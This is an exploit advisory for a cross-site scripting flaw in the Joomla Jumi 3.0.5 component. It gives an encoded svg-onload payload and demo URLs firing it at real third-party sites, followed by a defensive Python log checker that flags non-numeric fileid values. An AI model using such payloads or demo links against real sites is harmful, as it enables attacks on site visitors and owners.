Joomla Jumi component version 3.0.5 suffers from a cross-site scripting vulnerability.
######################
# Exploit Title : Joomla Component com_jumi - Cross Site Scripting
# Exploit Author : Persian Hack Team
# Vendor Homepage : http://extensions.joomla.org/extension/jumi
# Category: [ Webapps ]
# Tested on: [ Win ]
# Date: 2016/05/26
# Version : 3.0.5
######################
#
# PoC:
# The fileid parameter is vulnerable to XSS
# Payload = ">Persian<svg%2Fonload%3Dconfirm(%2FMobhaM%2F)>Hack Team
# Demo :
# http://www.ic.gov.sa/index.php?option=com_jumi&view=application&fileid=5%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team
# http://www.starfilcas.com/index.php?option=com_jumi&view=application&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=223&lang=en
# http://www.ballhockeyone.com/index.php?option=com_jumi&view=application&fileid=47%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=252
# http://www.comunico.com/index.php?option=com_jumi&fileid=3%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM%2F%29%3EHack%20Team&Itemid=80&svpage=programs_academic
#
######################
# Discovered by : Mojtaba MobhaM
# Greetz : T3NZOG4N & FireKernel & Milad Hacking & JOK3R And All Persian Hack Team Members
# Homepage : persian-team.ir
######################
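
For defenders, a log check for the pattern reported above. This is an added example, not part of the original advisory or the Jumi project: it flags com_jumi requests whose fileid is not a plain integer, on the assumption (taken from the numeric values in the demo URLs) that legitimate fileid values are numeric. The function name and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample lines in Apache/nginx combined log format.
# Client addresses come from the RFC 5737 documentation ranges.
SAMPLE_LOG = [
    '192.0.2.10 - - [26/May/2016:10:00:01 +0000] "GET /index.php?option=com_jumi'
    '&view=application&fileid=5 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [26/May/2016:10:00:09 +0000] "GET /index.php?option=com_jumi'
    '&view=application&fileid=5%22%3EPersian%3Csvg%2Fonload%3Dconfirm%28%2FMobhaM'
    '%2F%29%3EHack%20Team HTTP/1.1" 200 5300 "-" "Mozilla/5.0"',
    '192.0.2.44 - - [26/May/2016:10:01:30 +0000] "GET /index.php?option=com_content'
    '&view=article&id=3 HTTP/1.1" 200 8000 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [26/May/2016:10:02:02 +0000] "GET /index.php?fileid=47abc'
    '&option=com_jumi&Itemid=252 HTTP/1.1" 200 5200 "-" "Mozilla/5.0"',
]

# Client address and request target from the start of a combined-format line.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*"'
)

def suspicious_jumi_requests(lines):
    """Return (client_ip, decoded_fileid) for com_jumi requests whose fileid
    is not a plain integer. Only the query string is inspected; parameters
    sent in a POST body do not appear in access logs and are not covered."""
    hits = []
    for line in lines:
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a parseable request line
        # parse_qs percent-decodes values, so encoded markup is compared decoded.
        query = parse_qs(urlsplit(m.group("target")).query, keep_blank_values=True)
        if "com_jumi" not in query.get("option", []):
            continue
        for value in query.get("fileid", []):
            if not re.fullmatch(r"[0-9]+", value):
                hits.append((m.group("ip"), value))
    return hits

if __name__ == "__main__":
    for ip, value in suspicious_jumi_requests(SAMPLE_LOG):
        print(f"{ip}\tfileid={value!r}")
```

The same integer-only rule can be enforced at the application or WAF layer, so that a non-numeric fileid is rejected before it reaches the page output.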